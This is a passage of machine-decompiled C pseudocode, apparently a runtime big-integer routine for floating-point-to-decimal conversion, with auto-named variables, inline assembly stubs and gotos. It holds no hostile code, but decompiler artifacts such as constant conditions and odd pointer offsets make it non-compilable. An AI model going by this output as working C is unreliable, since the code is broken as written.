									E013BF6C0(_t1134, _t1333);
									_push(_t1134);
									 *_t1317 = _t1333;
									_t833 = E013BF7D0(_t1134);
									_t1136 = _t1134;
									_t834 = L013C1F30(_t833, _t1111, _t1136, _t1203);
									_v1904 = _t834;
									_t1250 = 0x20;
									__eflags = _t834 - 0x7fffffff;
									if(_t834 == 0x7fffffff) {
										L25:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t834 - 0x80000000;
										if(_t834 == 0x80000000) {
											goto L25;
										}
									}
									_t1204 = _v1868;
									__eflags = _t1292;
									_v468 = _v1912;
									_v464 = _t1292;
									_t1139 = (0 | _t1292 != 0x00000000) + 1;
									_v1892 = _t1139;
									_v472 = _t1139;
									__eflags = _t1204 - 0x433;
									if(_t1204 < 0x433) {
										__eflags = _t1204 - 0x35;
										if(_t1204 == 0x35) {
											L96:
											__eflags = _t1292;
											_t209 =  &_v1884;
											 *_t209 = _v1884 & 0x00000000;
											__eflags =  *_t209;
											_t840 =  *((intOrPtr*)(_t1313 + 4 + (0 | _t1292 != 0x00000000) * 4 - 0x1d4));
											asm("bsr eax, eax");
											if( *_t209 == 0) {
												_t841 = 0;
												__eflags = 0;
											} else {
												_t841 = _t840 + 1;
											}
											__eflags = _t1250 - _t841 - _t1111;
											asm("sbb esi, esi");
											_t1294 =  ~_t1292 + _t1139;
											__eflags = _t1294 - 0x73;
											if(_t1294 <= 0x73) {
												_t1205 = _t1294 - 1;
												__eflags = _t1205 - 0xffffffff;
												if(_t1205 != 0xffffffff) {
													_t1271 = _t1205 - 1;
													while(1) {
														__eflags = _t1205 - _t1139;
														if(_t1205 >= _t1139) {
															_t1030 = 0;
															__eflags = 0;
														} else {
															_t1030 =  *(_t1313 + _t1205 * 4 - 0x1d0);
														}
														__eflags = _t1271 - _t1139;
														if(_t1271 >= _t1139) {
															_t1169 = 0;
															__eflags = 0;
														} else {
															_t1169 =  *(_t1313 + _t1205 * 4 - 0x1d4);
														}
														 *(_t1313 + _t1205 * 4 - 0x1d0) = _t1169 >> 0x0000001f | _t1030 + _t1030;
														_t1205 = _t1205 - 1;
														_t1271 = _t1271 - 1;
														__eflags = _t1205 - 0xffffffff;
														if(_t1205 == 0xffffffff) {
															goto L111;
														}
														_t1139 = _v472;
													}
												}
												L111:
												_v472 = _t1294;
											} else {
												_v1400 = _v1400 & 0x00000000;
												_v472 = _v472 & 0x00000000;
												E013B9BE6( &_v468, 0x1cc,  &_v1396, 0);
												_t1317 =  &(_t1317[4]);
											}
											_t1253 = 0x434 >> 5;
											E013B2C30(0x434 >> 5,  &_v1396, 0, 0x434);
											__eflags = 1;
											 *(_t1313 + 0xbad63d) = 1 << (0x00000434 - _v1868 & 0x0000001f);
										} else {
											_v1396 = _v1396 & 0x00000000;
											_v1392 = 0x100000;
											_v1400 = 2;
											__eflags = _t1292;
											if(_t1292 != 0) {
												_t1233 = 0;
												__eflags = 0;
												while(1) {
													_t1035 =  *((intOrPtr*)(_t1313 + _t1233 - 0x570));
													__eflags = _t1035 -  *((intOrPtr*)(_t1313 + _t1233 - 0x1d0));
													if(_t1035 !=  *((intOrPtr*)(_t1313 + _t1233 - 0x1d0))) {
														goto L96;
													}
													_t1233 = _t1233 + 4;
													__eflags = _t1233 - 8;
													if(_t1233 != 8) {
														continue;
													} else {
														__eflags = 0;
														asm("bsr eax, esi");
														_v1884 = 0;
														if(0 == 0) {
															_t1036 = 0;
														} else {
															_t1036 = _t1035 + 1;
														}
														__eflags = _t1250 - _t1036 - 2;
														asm("sbb esi, esi");
														_t1305 =  ~_t1292 + _t1139;
														__eflags = _t1305 - 0x73;
														if(_t1305 <= 0x73) {
															_t1234 = _t1305 - 1;
															__eflags = _t1234 - 0xffffffff;
															if(_t1234 != 0xffffffff) {
																_t1274 = _t1234 - 1;
																while(1) {
																	__eflags = _t1234 - _t1139;
																	if(_t1234 >= _t1139) {
																		_t1042 = 0;
																	} else {
																		_t1042 =  *(_t1313 + _t1234 * 4 - 0x1d0);
																	}
																	__eflags = _t1274 - _t1139;
																	if(_t1274 >= _t1139) {
																		_t1173 = 0;
																	} else {
																		_t1173 =  *(_t1313 + _t1234 * 4 - 0x1d4);
																	}
																	 *(_t1313 + _t1234 * 4 - 0x1d0) = _t1173 >> 0x0000001e | _t1042 << 0x00000002;
																	_t1234 = _t1234 - 1;
																	_t1274 = _t1274 - 1;
																	__eflags = _t1234 - 0xffffffff;
																	if(_t1234 == 0xffffffff) {
																		goto L94;
																	}
																	_t1139 = _v472;
																}
															}
															L94:
															_v472 = _t1305;
														} else {
															_v1400 = 0;
															_v472 = 0;
															E013B9BE6( &_v468, 0x1cc,  &_v1396, 0);
															_t1317 =  &(_t1317[4]);
														}
														_t1253 = 0x435 >> 5;
														E013B2C30(0x435 >> 5,  &_v1396, 0, 0x435);
														 *(_t1313 + 0xbad63d) = 1 << (0x00000435 - _v1868 & 0x0000001f);
													}
													goto L113;
												}
											}
											goto L96;
										}
										L113:
										_t847 = _t1253 + 1;
										_t1297 = 0x1cc;
										_v1400 = _t847;
										_v936 = _t847;
										E013B9BE6( &_v932, 0x1cc,  &_v1396, _t847 << 2);
										_t1321 =  &(_t1317[7]);
										_t1111 = 1;
										__eflags = 1;
									} else {
										_v1396 = _v1396 & 0x00000000;
										_v1392 = 0x100000;
										_v1400 = 2;
										__eflags = _t1292;
										if(_t1292 == 0) {
											L53:
											_t1176 = _t1204 - 0x432;
											_t1177 = _t1176 & 0x0000001f;
											_v1900 = _t1176 >> 5;
											_v1876 = _t1177;
											_v1920 = _t1250 - _t1177;
											_t1050 = E013C1E90(_t1111, _t1250 - _t1177, 0);
											_t1236 = _v1892;
											_t1051 = _t1050 - 1;
											_t128 =  &_v1872;
											 *_t128 = _v1872 & 0x00000000;
											__eflags =  *_t128;
											_v1912 = _t1051;
											_t1052 =  !_t1051;
											_v1884 = _t1052;
											asm("bsr eax, ecx");
											if( *_t128 == 0) {
												_t136 =  &_v1880;
												 *_t136 = _v1880 & 0x00000000;
												__eflags =  *_t136;
											} else {
												_v1880 = _t1052 + 1;
											}
											_t1180 = _v1900;
											_t1297 = 0x1cc;
											_t1053 = _t1236 + _t1180;
											__eflags = _t1053 - 0x73;
											if(_t1053 <= 0x73) {
												__eflags = _t1250 - _v1880 - _v1876;
												asm("sbb eax, eax");
												_t1056 =  ~_t1053 + _t1236 + _t1180;
												_v1908 = _t1056;
												__eflags = _t1056 - 0x73;
												if(_t1056 > 0x73) {
													goto L57;
												} else {
													_t1276 = _t1180 - 1;
													_t1064 = _t1056 - 1;
													_v1872 = _t1276;
													_v1868 = _t1064;
													__eflags = _t1064 - _t1276;
													if(_t1064 != _t1276) {
														_t1280 = _t1064 - _t1180;
														__eflags = _t1280;
														_t1183 =  &(( &_v472)[_t1280]);
														_v1892 = _t1183;
														while(1) {
															__eflags = _t1280 - _t1236;
															if(_t1280 >= _t1236) {
																_t1068 = 0;
																__eflags = 0;
															} else {
																_t1068 = _t1183[1];
															}
															_v1880 = _t1068;
															_t156 = _t1280 - 1; // -4
															__eflags = _t156 - _t1236;
															if(_t156 >= _t1236) {
																_t1070 = 0;
																__eflags = 0;
															} else {
																_t1070 =  *_t1183;
															}
															_t1186 = _v1868;
															 *(_t1313 + _t1186 * 4 - 0x1d0) = (_t1070 & _v1884) >> _v1920 | (_v1880 & _v1912) << _v1876;
															_t1075 = _t1186 - 1;
															_t1183 = _v1892 - 4;
															_v1868 = _t1075;
															_t1280 = _t1280 - 1;
															_v1892 = _t1183;
															__eflags = _t1075 - _v1872;
															if(_t1075 == _v1872) {
																break;
															}
															_t1236 = _v472;
														}
														_t1180 = _v1900;
													}
													__eflags = _t1180;
													if(_t1180 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1180 << 2);
														_t1317 =  &(_t1317[3]);
													}
													_v472 = _v1908;
												}
											} else {
												L57:
												_v1400 = 0;
												_v472 = 0;
												E013B9BE6( &_v468, _t1297,  &_v1396, 0);
												_t1317 =  &(_t1317[4]);
											}
											_v1396 = 2;
											_push(4);
										} else {
											_t1188 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1313 + _t1188 - 0x570)) -  *((intOrPtr*)(_t1313 + _t1188 - 0x1d0));
												if( *((intOrPtr*)(_t1313 + _t1188 - 0x570)) !=  *((intOrPtr*)(_t1313 + _t1188 - 0x1d0))) {
													goto L53;
												}
												_t1188 = _t1188 + 4;
												__eflags = _t1188 - 8;
												if(_t1188 != 8) {
													continue;
												} else {
													_t1189 = _t1204 - 0x431;
													_t1190 = _t1189 & 0x0000001f;
													_v1880 = _t1189 >> 5;
													_v1900 = _t1190;
													_v1872 = _t1250 - _t1190;
													_t1081 = E013C1E90(_t1111, _t1250 - _t1190, 0);
													_t1241 = _v1892;
													_t1082 = _t1081 - 1;
													_t68 =  &_v1884;
													 *_t68 = _v1884 & 0x00000000;
													__eflags =  *_t68;
													_v1908 = _t1082;
													_t1083 =  !_t1082;
													_v1912 = _t1083;
													asm("bsr eax, ecx");
													if( *_t68 == 0) {
														_t76 =  &_v1876;
														 *_t76 = _v1876 & 0x00000000;
														__eflags =  *_t76;
													} else {
														_v1876 = _t1083 + 1;
													}
													_t1193 = _v1880;
													_t1297 = 0x1cc;
													_t1084 = _t1241 + _t1193;
													__eflags = _t1084 - 0x73;
													if(_t1084 <= 0x73) {
														__eflags = _t1250 - _v1876 - _v1900;
														asm("sbb eax, eax");
														_t1087 =  ~_t1084 + _t1241 + _t1193;
														_v1884 = _t1087;
														__eflags = _t1087 - 0x73;
														if(_t1087 > 0x73) {
															goto L35;
														} else {
															_t1282 = _t1193 - 1;
															_t1093 = _t1087 - 1;
															_v1920 = _t1282;
															_v1868 = _t1093;
															__eflags = _t1093 - _t1282;
															if(_t1093 != _t1282) {
																_t1286 = _t1093 - _t1193;
																__eflags = _t1286;
																_t1196 =  &(( &_v472)[_t1286]);
																_v1892 = _t1196;
																while(1) {
																	__eflags = _t1286 - _t1241;
																	if(_t1286 >= _t1241) {
																		_t1097 = 0;
																		__eflags = 0;
																	} else {
																		_t1097 = _t1196[1];
																	}
																	_v1876 = _t1097;
																	_t96 = _t1286 - 1; // -4
																	__eflags = _t96 - _t1241;
																	if(_t96 >= _t1241) {
																		_t1099 = 0;
																		__eflags = 0;
																	} else {
																		_t1099 =  *_t1196;
																	}
																	_t1199 = _v1868;
																	 *(_t1313 + _t1199 * 4 - 0x1d0) = (_t1099 & _v1912) >> _v1872 | (_v1876 & _v1908) << _v1900;
																	_t1104 = _t1199 - 1;
																	_t1196 = _v1892 - 4;
																	_v1868 = _t1104;
																	_t1286 = _t1286 - 1;
																	_v1892 = _t1196;
																	__eflags = _t1104 - _v1920;
																	if(_t1104 == _v1920) {
																		break;
																	}
																	_t1241 = _v472;
																}
																_t1193 = _v1880;
															}
															__eflags = _t1193;
															if(_t1193 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1193 << 2);
																_t1317 =  &(_t1317[3]);
															}
															_v472 = _v1884;
														}
													} else {
														L35:
														_v1400 = 0;
														_v472 = 0;
														E013B9BE6( &_v468, _t1297,  &_v1396, 0);
														_t1317 =  &(_t1317[4]);
													}
													_t1092 = 4;
													_v1396 = _t1092;
													_push(_t1092);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_v1392 = _v1392 & 0x00000000;
										_push( &_v1396);
										_v936 = _t1111;
										_push(_t1297);
										_push( &_v932);
										_v1400 = _t1111;
										E013B9BE6();
										_t1321 =  &(_t1317[4]);
									}
									_t852 = _v1904;
									_t1141 = 0xa;
									_v1912 = _t1141;
									__eflags = _t852;
									if(_t852 < 0) {
										_t853 =  ~_t852;
										_t854 = _t853 / _t1141;
										_v1892 = _t854;
										_t1142 = _t853 % _t1141;
										_v1920 = _t1142;
										__eflags = _t854;
										if(_t854 == 0) {
											L246:
											__eflags = _t1142;
											if(_t1142 != 0) {
												_t900 =  *(0x13c7e24 + _t1142 * 4);
												_v1884 = _t900;
												__eflags = _t900;
												if(_t900 == 0) {
													L258:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L259;
												} else {
													__eflags = _t900 - _t1111;
													if(_t900 != _t1111) {
														_t1152 = _v472;
														__eflags = _t1152;
														if(_t1152 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1259 = 0;
															__eflags = 0;
															do {
																_t1218 = _t900 *  *(_t1313 + _t1259 * 4 - 0x1d0) >> 0x20;
																 *(_t1313 + _t1259 * 4 - 0x1d0) = _t900 *  *(_t1313 + _t1259 * 4 - 0x1d0) + _v1872;
																_t900 = _v1884;
																asm("adc edx, 0x0");
																_t1259 = _t1259 + 1;
																_v1872 = _t1218;
																__eflags = _t1259 - _t1152;
															} while (_t1259 != _t1152);
															__eflags = _t1218;
															if(_t1218 != 0) {
																_t907 = _v472;
																__eflags = _t907 - 0x73;
																if(_t907 >= 0x73) {
																	goto L258;
																} else {
																	 *(_t1313 + _t907 * 4 - 0x1d0) = _t1218;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t854 - 0x26;
												if(_t854 > 0x26) {
													_t854 = 0x26;
												}
												_t1153 =  *(0x13c7d8e + _t854 * 4) & 0x000000ff;
												_v1900 = _t854;
												_v1400 = ( *(0x13c7d8e + _t854 * 4) & 0x000000ff) + ( *(0x13c7d8f + _t854 * 4) & 0x000000ff);
												E013B2C30(_t1153 << 2,  &_v1396, 0, _t1153 << 2);
												_t918 = E013B32F0( &(( &_v1396)[_t1153]), 0x13c7488 + ( *(0x13c7d8c + _v1900 * 4) & 0x0000ffff) * 4, ( *(0x13c7d8f + _t854 * 4) & 0x000000ff) << 2);
												_t1262 = _v1400;
												_t1321 =  &(_t1321[6]);
												__eflags = _t1262 - _t1111;
												if(_t1262 > _t1111) {
													__eflags = _v472 - _t1111;
													if(_v472 > _t1111) {
														__eflags = _t1262 - _v472;
														_t1219 =  &_v1396;
														_t548 = _t1262 - _v472 > 0;
														__eflags = _t548;
														_t919 = _t918 & 0xffffff00 | _t548;
														if(_t548 >= 0) {
															_t1219 =  &_v468;
														}
														_v1876 = _t1219;
														_t1154 =  &_v468;
														__eflags = _t919;
														if(_t919 == 0) {
															_t1154 =  &_v1396;
														}
														_v1872 = _t1154;
														__eflags = _t919;
														if(_t919 == 0) {
															_t1155 = _v472;
															_v1880 = _t1155;
														} else {
															_t1155 = _t1262;
															_v1880 = _t1262;
														}
														__eflags = _t919;
														if(_t919 != 0) {
															_t1262 = _v472;
														}
														_t920 = 0;
														_t1299 = 0;
														_v1864 = 0;
														__eflags = _t1155;
														if(_t1155 == 0) {
															L240:
															_v472 = _t920;
															_t1297 = 0x1cc;
															_t921 = _t920 << 2;
															__eflags = _t921;
															_push(_t921);
															_t922 =  &_v1860;
															goto L241;
														} else {
															do {
																__eflags =  *(_t1219 + _t1299 * 4);
																if( *(_t1219 + _t1299 * 4) != 0) {
																	_t1222 = 0;
																	_t1156 = _t1299;
																	_v1868 = _v1868 & 0;
																	_v1908 = 0;
																	__eflags = _t1262;
																	if(_t1262 == 0) {
																		L237:
																		__eflags = _t1156 - 0x73;
																		if(_t1156 == 0x73) {
																			goto L255;
																		} else {
																			_t1155 = _v1880;
																			_t1219 = _v1876;
																			goto L239;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1156 - 0x73;
																			if(_t1156 == 0x73) {
																				goto L232;
																			}
																			__eflags = _t1156 - _t920;
																			if(_t1156 == _t920) {
																				 *(_t1313 + _t1156 * 4 - 0x740) =  *(_t1313 + _t1156 * 4 - 0x740) & 0x00000000;
																				_t940 = _v1868 + 1 + _t1299;
																				__eflags = _t940;
																				_v1864 = _t940;
																			}
																			_t933 =  *(_v1872 + _v1868 * 4);
																			_t1224 = _v1876;
																			_t1222 = _t933 *  *(_t1224 + _t1299 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1313 + _t1156 * 4 - 0x740) =  *(_t1313 + _t1156 * 4 - 0x740) + _t933 *  *(_t1224 + _t1299 * 4) + _v1908;
																			asm("adc edx, 0x0");
																			_t937 = _v1868 + 1;
																			_t1156 = _t1156 + 1;
																			_v1868 = _t937;
																			__eflags = _t937 - _t1262;
																			_v1908 = _t1222;
																			_t920 = _v1864;
																			if(_t937 != _t1262) {
																				continue;
																			} else {
																				goto L232;
																			}
																			while(1) {
																				L232:
																				__eflags = _t1222;
																				if(_t1222 == 0) {
																					goto L237;
																				}
																				__eflags = _t1156 - 0x73;
																				if(_t1156 == 0x73) {
																					L255:
																					_t1297 = 0x1cc;
																					goto L256;
																				} else {
																					__eflags = _t1156 - _t920;
																					if(_t1156 == _t920) {
																						_t604 = _t1313 + _t1156 * 4 - 0x740;
																						 *_t604 =  *(_t1313 + _t1156 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t604;
																						_t610 = _t1156 + 1; // 0x1
																						_v1864 = _t610;
																					}
																					_t931 = _t1222;
																					_t1222 = 0;
																					 *(_t1313 + _t1156 * 4 - 0x740) =  *(_t1313 + _t1156 * 4 - 0x740) + _t931;
																					_t920 = _v1864;
																					asm("adc edx, edx");
																					_t1156 = _t1156 + 1;
																					continue;
																				}
																				goto L243;
																			}
																			goto L237;
																		}
																		goto L232;
																	}
																} else {
																	__eflags = _t1299 - _t920;
																	if(_t1299 == _t920) {
																		 *(_t1313 + _t1299 * 4 - 0x740) =  *(_t1313 + _t1299 * 4 - 0x740) & 0x00000000;
																		_t567 = _t1299 + 1; // 0x1
																		_t920 = _t567;
																		_v1864 = _t920;
																	}
																	goto L239;
																}
																goto L243;
																L239:
																_t1299 = _t1299 + 1;
																__eflags = _t1299 - _t1155;
															} while (_t1299 != _t1155);
															goto L240;
														}
													} else {
														_t1297 = 0x1cc;
														_v1872 = _v468;
														_v472 = _t1262;
														E013B9BE6( &_v468, 0x1cc,  &_v1396, _t1262 << 2);
														_t948 = _v1872;
														_t1321 =  &(_t1321[4]);
														__eflags = _t948;
														if(_t948 != 0) {
															__eflags = _t948 - _t1111;
															if(_t948 == _t1111) {
																goto L242;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L242;
																} else {
																	_v1884 = _v472;
																	_t1158 = 0;
																	_t1263 = 0;
																	__eflags = 0;
																	do {
																		_t1220 = _t948 *  *(_t1313 + _t1263 * 4 - 0x1d0) >> 0x20;
																		 *(_t1313 + _t1263 * 4 - 0x1d0) = _t948 *  *(_t1313 + _t1263 * 4 - 0x1d0) + _t1158;
																		_t948 = _v1872;
																		asm("adc edx, 0x0");
																		_t1263 = _t1263 + 1;
																		_t1158 = _t1220;
																		__eflags = _t1263 - _v1884;
																	} while (_t1263 != _v1884);
																	__eflags = _t1158;
																	if(_t1158 == 0) {
																		goto L242;
																	} else {
																		_t951 = _v472;
																		__eflags = _t951 - 0x73;
																		if(_t951 >= 0x73) {
																			L256:
																			_v2408 = 0;
																			_v472 = 0;
																			E013B9BE6( &_v468, _t1297,  &_v2404, 0);
																			_t1321 =  &(_t1321[4]);
																			_t925 = 0;
																		} else {
																			 *(_t1313 + _t951 * 4 - 0x1d0) = _t1158;
																			_v472 = _v472 + 1;
																			goto L242;
																		}
																	}
																}
															}
														} else {
															_v2408 = _t948;
															_v472 = _t948;
															_push(_t948);
															_t922 =  &_v2404;
															L241:
															_push(_t922);
															_push(_t1297);
															_push( &_v468);
															E013B9BE6();
															_t1321 =  &(_t1321[4]);
															L242:
															_t925 = _t1111;
														}
													}
												} else {
													_t1264 = _v1396;
													__eflags = _t1264;
													if(_t1264 != 0) {
														__eflags = _t1264 - _t1111;
														if(_t1264 == _t1111) {
															goto L194;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L194;
															} else {
																_t1159 = 0;
																_v1884 = _v472;
																_t1300 = 0;
																__eflags = 0;
																do {
																	_t953 = _t1264;
																	_t1221 = _t953 *  *(_t1313 + _t1300 * 4 - 0x1d0) >> 0x20;
																	 *(_t1313 + _t1300 * 4 - 0x1d0) = _t953 *  *(_t1313 + _t1300 * 4 - 0x1d0) + _t1159;
																	asm("adc edx, 0x0");
																	_t1300 = _t1300 + 1;
																	_t1159 = _t1221;
																	__eflags = _t1300 - _v1884;
																} while (_t1300 != _v1884);
																__eflags = _t1159;
																if(_t1159 == 0) {
																	goto L194;
																} else {
																	_t956 = _v472;
																	__eflags = _t956 - 0x73;
																	if(_t956 >= 0x73) {
																		_v2408 = 0;
																		_v472 = 0;
																		E013B9BE6( &_v468, 0x1cc,  &_v2404, 0);
																		_t1321 =  &(_t1321[4]);
																		_t925 = 0;
																		goto L195;
																	} else {
																		 *(_t1313 + _t956 * 4 - 0x1d0) = _t1159;
																		_v472 = _v472 + 1;
																		goto L194;
																	}
																}
															}
														}
														goto L261;
													} else {
														__eflags = 0;
														_v2408 = 0;
														_v472 = 0;
														E013B9BE6( &_v468, 0x1cc,  &_v2404, 0);
														_t1321 =  &(_t1321[4]);
														L194:
														_t925 = _t1111;
													}
													L195:
													_t1297 = 0x1cc;
												}
												L243:
												__eflags = _t925;
												if(_t925 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L259:
													_push( &_v2404);
													_t903 =  &_v468;
													goto L260;
												} else {
													goto L244;
												}
												goto L261;
												L244:
												_t854 = _v1892 - _v1900;
												__eflags = _t854;
												_v1892 = _t854;
											} while (_t854 != 0);
											_t1142 = _v1920;
											goto L246;
										}
									} else {
										_t965 = _t852 / _t1141;
										_v1872 = _t965;
										_t1160 = _t852 % _t1141;
										_v1920 = _t1160;
										__eflags = _t965;
										if(_t965 == 0) {
											L174:
											__eflags = _t1160;
											if(_t1160 != 0) {
												_t966 =  *(0x13c7e24 + _t1160 * 4);
												_v1884 = _t966;
												__eflags = _t966;
												if(_t966 != 0) {
													__eflags = _t966 - _t1111;
													if(_t966 != _t1111) {
														_t1161 = _v936;
														__eflags = _t1161;
														if(_t1161 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1265 = 0;
															__eflags = 0;
															do {
																_t1226 = _t966 *  *(_t1313 + _t1265 * 4 - 0x3a0) >> 0x20;
																 *(_t1313 + _t1265 * 4 - 0x3a0) = _t966 *  *(_t1313 + _t1265 * 4 - 0x3a0) + _v1872;
																_t966 = _v1884;
																asm("adc edx, 0x0");
																_t1265 = _t1265 + 1;
																_v1872 = _t1226;
																__eflags = _t1265 - _t1161;
															} while (_t1265 != _t1161);
															__eflags = _t1226;
															if(_t1226 != 0) {
																_t969 = _v936;
																__eflags = _t969 - 0x73;
																if(_t969 >= 0x73) {
																	goto L176;
																} else {
																	 *(_t1313 + _t969 * 4 - 0x3a0) = _t1226;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L176:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L180;
												}
											}
										} else {
											do {
												__eflags = _t965 - 0x26;
												if(_t965 > 0x26) {
													_t965 = 0x26;
												}
												_t1162 =  *(0x13c7d8e + _t965 * 4) & 0x000000ff;
												_v1876 = _t965;
												_v1400 = ( *(0x13c7d8e + _t965 * 4) & 0x000000ff) + ( *(0x13c7d8f + _t965 * 4) & 0x000000ff);
												E013B2C30(_t1162 << 2,  &_v1396, 0, _t1162 << 2);
												_t982 = E013B32F0( &(( &_v1396)[_t1162]), 0x13c7488 + ( *(0x13c7d8c + _v1876 * 4) & 0x0000ffff) * 4, ( *(0x13c7d8f + _t965 * 4) & 0x000000ff) << 2);
												_t1268 = _v1400;
												_t1321 =  &(_t1321[6]);
												__eflags = _t1268 - _t1111;
												if(_t1268 > _t1111) {
													__eflags = _v936 - _t1111;
													if(_v936 > _t1111) {
														__eflags = _t1268 - _v936;
														_t1227 =  &_v1396;
														_t338 = _t1268 - _v936 > 0;
														__eflags = _t338;
														_t983 = _t982 & 0xffffff00 | _t338;
														if(_t338 >= 0) {
															_t1227 =  &_v932;
														}
														_v1900 = _t1227;
														_t1163 =  &_v932;
														__eflags = _t983;
														if(_t983 == 0) {
															_t1163 =  &_v1396;
														}
														_v1880 = _t1163;
														__eflags = _t983;
														if(_t983 == 0) {
															_t1164 = _v936;
															_v1908 = _t1164;
														} else {
															_t1164 = _t1268;
															_v1908 = _t1268;
														}
														__eflags = _t983;
														if(_t983 != 0) {
															_t1268 = _v936;
														}
														_t984 = 0;
														_t1302 = 0;
														_v1864 = 0;
														__eflags = _t1164;
														if(_t1164 == 0) {
															L168:
															_v936 = _t984;
															_t1297 = 0x1cc;
															_t985 = _t984 << 2;
															__eflags = _t985;
															_push(_t985);
															_t986 =  &_v1860;
															goto L169;
														} else {
															do {
																__eflags =  *(_t1227 + _t1302 * 4);
																if( *(_t1227 + _t1302 * 4) != 0) {
																	_t1230 = 0;
																	_t1165 = _t1302;
																	_v1868 = _v1868 & 0;
																	_v1892 = 0;
																	__eflags = _t1268;
																	if(_t1268 == 0) {
																		L165:
																		__eflags = _t1165 - 0x73;
																		if(_t1165 == 0x73) {
																			goto L177;
																		} else {
																			_t1164 = _v1908;
																			_t1227 = _v1900;
																			goto L167;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1165 - 0x73;
																			if(_t1165 == 0x73) {
																				goto L160;
																			}
																			__eflags = _t1165 - _t984;
																			if(_t1165 == _t984) {
																				 *(_t1313 + _t1165 * 4 - 0x740) =  *(_t1313 + _t1165 * 4 - 0x740) & 0x00000000;
																				_t1004 = _v1868 + 1 + _t1302;
																				__eflags = _t1004;
																				_v1864 = _t1004;
																			}
																			_t997 =  *(_v1880 + _v1868 * 4);
																			_t1232 = _v1900;
																			_t1230 = _t997 *  *(_t1232 + _t1302 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1313 + _t1165 * 4 - 0x740) =  *(_t1313 + _t1165 * 4 - 0x740) + _t997 *  *(_t1232 + _t1302 * 4) + _v1892;
																			asm("adc edx, 0x0");
																			_t1001 = _v1868 + 1;
																			_t1165 = _t1165 + 1;
																			_v1868 = _t1001;
																			__eflags = _t1001 - _t1268;
																			_v1892 = _t1230;
																			_t984 = _v1864;
																			if(_t1001 != _t1268) {
																				continue;
																			} else {
																				goto L160;
																			}
																			while(1) {
																				L160:
																				__eflags = _t1230;
																				if(_t1230 == 0) {
																					goto L165;
																				}
																				__eflags = _t1165 - 0x73;
																				if(_t1165 == 0x73) {
																					L177:
																					__eflags = 0;
																					_t1297 = 0x1cc;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t992 =  &_v2404;
																					goto L178;
																				} else {
																					__eflags = _t1165 - _t984;
																					if(_t1165 == _t984) {
																						_t394 = _t1313 + _t1165 * 4 - 0x740;
																						 *_t394 =  *(_t1313 + _t1165 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t394;
																						_t400 = _t1165 + 1; // 0x1
																						_v1864 = _t400;
																					}
																					_t995 = _t1230;
																					_t1230 = 0;
																					 *(_t1313 + _t1165 * 4 - 0x740) =  *(_t1313 + _t1165 * 4 - 0x740) + _t995;
																					_t984 = _v1864;
																					asm("adc edx, edx");
																					_t1165 = _t1165 + 1;
																					continue;
																				}
																				goto L171;
																			}
																			goto L165;
																		}
																		goto L160;
																	}
																} else {
																	__eflags = _t1302 - _t984;
																	if(_t1302 == _t984) {
																		 *(_t1313 + _t1302 * 4 - 0x740) =  *(_t1313 + _t1302 * 4 - 0x740) & 0x00000000;
																		_t357 = _t1302 + 1; // 0x1
																		_t984 = _t357;
																		_v1864 = _t984;
																	}
																	goto L167;
																}
																goto L171;
																L167:
																_t1302 = _t1302 + 1;
																__eflags = _t1302 - _t1164;
															} while (_t1302 != _t1164);
															goto L168;
														}
													} else {
														_t1297 = 0x1cc;
														_v1880 = _v932;
														_v936 = _t1268;
														E013B9BE6( &_v932, 0x1cc,  &_v1396, _t1268 << 2);
														_t1012 = _v1880;
														_t1321 =  &(_t1321[4]);
														__eflags = _t1012;
														if(_t1012 != 0) {
															__eflags = _t1012 - _t1111;
															if(_t1012 == _t1111) {
																goto L170;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L170;
																} else {
																	_v1884 = _v936;
																	_t1167 = 0;
																	_t1269 = 0;
																	__eflags = 0;
																	do {
																		_t1228 = _t1012 *  *(_t1313 + _t1269 * 4 - 0x3a0) >> 0x20;
																		 *(_t1313 + _t1269 * 4 - 0x3a0) = _t1012 *  *(_t1313 + _t1269 * 4 - 0x3a0) + _t1167;
																		_t1012 = _v1880;
																		asm("adc edx, 0x0");
																		_t1269 = _t1269 + 1;
																		_t1167 = _t1228;
																		__eflags = _t1269 - _v1884;
																	} while (_t1269 != _v1884);
																	__eflags = _t1167;
																	if(_t1167 == 0) {
																		goto L170;
																	} else {
																		_t1015 = _v936;
																		__eflags = _t1015 - 0x73;
																		if(_t1015 >= 0x73) {
																			_v1400 = 0;
																			_v936 = 0;
																			_push(0);
																			_t992 =  &_v1396;
																			L178:
																			_push(_t992);
																			_push(_t1297);
																			_push( &_v932);
																			E013B9BE6();
																			_t1321 =  &(_t1321[4]);
																			_t989 = 0;
																		} else {
																			 *(_t1313 + _t1015 * 4 - 0x3a0) = _t1167;
																			_v936 = _v936 + 1;
																			goto L170;
																		}
																	}
																}
															}
														} else {
															_v1400 = _t1012;
															_v936 = _t1012;
															_push(_t1012);
															_t986 =  &_v1396;
															L169:
															_push(_t986);
															_push(_t1297);
															_push( &_v932);
															E013B9BE6();
															_t1321 =  &(_t1321[4]);
															L170:
															_t989 = _t1111;
														}
													}
												} else {
													_t1270 = _v1396;
													__eflags = _t1270;
													if(_t1270 != 0) {
														__eflags = _t1270 - _t1111;
														if(_t1270 == _t1111) {
															goto L121;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L121;
															} else {
																_t1168 = 0;
